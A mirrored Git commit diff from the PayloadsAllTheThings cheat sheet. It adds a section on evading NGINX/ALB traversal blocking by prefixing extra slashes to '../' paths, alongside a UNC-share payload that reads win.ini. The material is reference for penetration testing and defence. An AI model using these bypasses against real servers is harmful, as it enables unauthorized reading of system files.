mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Added traversal bypass of nginx/alb
This commit is contained in:
parent
b0a9d49aea
commit
e8744406f9
@ -12,6 +12,7 @@
|
||||
* [Bypass "../" with ";"](#bypass--with-)
|
||||
* [Double URL encoding](#double-url-encoding)
|
||||
* [UNC Bypass](#unc-bypass)
|
||||
* [NGINX/ALB Bypass](#nginxalb-bypass)
|
||||
* [Path Traversal](#path-traversal)
|
||||
* [Interesting Linux files](#interesting-linux-files)
|
||||
* [Interesting Windows files](#interesting-windows-files)
|
||||
@ -89,6 +90,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
|
||||
\\localhost\c$\windows\win.ini
|
||||
```
|
||||
|
||||
### NGINX/ALB Bypass
|
||||
|
||||
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
|
||||
```http://nginx-server/../../``` will return a 400 bad request.
|
||||
|
||||
To bypass this behaviour just add forward slashes in front of the url:
|
||||
```http://nginx-server////////../../```
|
||||
|
||||
|
||||
## Path Traversal
|
||||
|
||||
@ -178,3 +187,4 @@ The following log files are controllable and can be included with an evil payloa
|
||||
* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
|
||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
||||
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
|
||||
* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
|
||||
|
Loading…
Reference in New Issue
Block a user